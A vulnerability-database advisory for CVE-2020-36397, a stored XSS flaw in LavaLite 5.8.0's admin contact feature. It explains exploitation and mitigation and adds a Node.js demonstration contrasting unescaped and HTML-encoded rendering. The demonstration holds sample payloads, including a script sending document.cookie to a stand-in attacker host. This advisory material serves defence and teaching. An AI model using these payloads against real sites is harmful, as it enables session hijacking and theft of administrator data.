VYPR
Moderate severity · NVD Advisory · Published Jul 2, 2021 · Updated Aug 4, 2024

CVE-2020-36397

Description

A stored cross-site scripting (XSS) vulnerability in the /admin/contact/contact component of LavaLite 5.8.0 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

LavaLite 5.8.0 stored XSS in the /admin/contact/contact component allows authenticated attackers to execute arbitrary web scripts via crafted 'New' parameter.

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in the /admin/contact/contact component of LavaLite version 5.8.0. The vulnerability allows authenticated attackers to inject arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter of the contact feature. The injected payload is stored and executed in the context of the victim's browser when the stored data is rendered. [1][2]

Exploitation

An attacker must first hold valid credentials for the admin panel. Once authenticated, the attacker opens the /admin/contact/contact page and submits a crafted value (for example, a <script> element or a tag carrying an inline event handler) in the "New" parameter. The value is stored in the application's database without being neutralised, and is later interpolated into the contact listing without HTML output encoding. Whenever any user with access to that page, including other administrators, views it, the stored script runs in their browser with their session. No interaction beyond loading the page is required. [1][2]

Impact

Successful exploitation lets the attacker run arbitrary script or HTML in the context of the affected admin page, that is, with the privileges of whichever administrator views the stored record. This can be used for session hijacking, defacement, theft of information visible in the admin interface, or performing admin-panel actions through the victim's authenticated session. The attacker needs an account that can reach the contact feature, so exposure is limited to the admin panel, but because the payload is stored it fires for every administrator who views the listing, turning one low-privileged admin account into a path to the others. [1][2]

Mitigation

As of the published references, no official patch or fixed version has been released by the vendor. The project repository on GitHub [2] lists the issue, but no commit or release addressing it is available. Users should monitor the repository for updates and consider temporarily restricting access to the admin contact feature until a fix is deployed. Independently of a vendor fix, the standard control for this class of bug is HTML output encoding of the stored value at render time (escaping rather than relying on input filtering), and a Content Security Policy on the admin interface limits what an injected script can do if encoding is missed. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the last update. [1][2]
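The Exploitation and Mitigation sections above describe the same flow from two sides: an unescaped stored field rendered into the admin page, and the output encoding that would neutralise it. The following added example, which is not LavaLite's own code, models that flow in a few lines of Node.js. The in-memory store, the field name "New", the render templates, the attacker.example host and the payloads are all constructed for illustration; the vulnerable and hardened renderers differ only in whether the stored value passes through an HTML encoder.

```javascript
// Added example, not LavaLite's own code: models the stored-XSS flow the
// advisory describes. The in-memory store, the field name "New" and the
// payloads below are constructed for illustration.

// Stage 1: an authenticated user submits the contact form. Storage keeps the
// raw value; the defect is in how it is later rendered, not in storage.
function submitContact(store, fields) {
  const record = { id: store.length + 1, ...fields };
  store.push(record);
  return record;
}

// Vulnerable listing: the stored "New" value is interpolated straight into
// the admin page markup (the pattern behind CVE-2020-36397).
function renderContactsUnsafe(store) {
  return store
    .map((r) => `<tr><td>${r.id}</td><td>${r.New}</td></tr>`)
    .join('\n');
}

// HTML encoder for text and quoted-attribute contexts, the same transform
// PHP's htmlspecialchars() or Blade's {{ }} applies.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened listing: every untrusted value is encoded at output time.
function renderContactsSafe(store) {
  return store
    .map((r) => `<tr><td>${r.id}</td><td>${escapeHtml(r.New)}</td></tr>`)
    .join('\n');
}

// Crude review heuristic: does the rendered page contain a script element or
// an inline event handler on any tag? It catches the two payloads used below
// but is not a substitute for output encoding (it misses javascript: URLs in
// attributes, SVG vectors, and payloads split across fields).
function containsActiveMarkup(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed payloads of the kind an attacker would submit in "New".
const PAYLOADS = [
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  '<img src=x onerror="alert(document.domain)">',
  'Plain text & "quotes" stay readable',
];

// Runs the whole flow against a fresh store and reports what each renderer
// does with the payloads.
function demonstrate() {
  const store = [];
  for (const p of PAYLOADS) submitContact(store, { New: p });
  const unsafe = renderContactsUnsafe(store);
  const safe = renderContactsSafe(store);
  return {
    unsafeHasActiveMarkup: containsActiveMarkup(unsafe),
    safeHasActiveMarkup: containsActiveMarkup(safe),
    safeRendersText: safe.includes('&lt;script&gt;') && safe.includes('&quot;quotes&quot;'),
    unsafe,
    safe,
  };
}

const result = demonstrate();
console.log('unsafe render contains executable markup:', result.unsafeHasActiveMarkup);
console.log('safe render contains executable markup:  ', result.safeHasActiveMarkup);
```

Run it with `node` and compare the two `<td>` cells: the unsafe render emits the `<script>` and `onerror` payloads verbatim, the safe render emits `&lt;script&gt;` and `&lt;img ... onerror=...&gt;`, which a browser displays as text. Note that `escapeHtml` is only correct for text nodes and quoted attribute values; a value placed in an unquoted attribute, a URL, or inline JavaScript needs the encoder for that context.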

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                    Affected versions   Patched versions
lavalite/cms (Packagist)   <= 5.8.0            none

Affected products: 2

Patches: 0 (no patches discovered yet)

References: 3
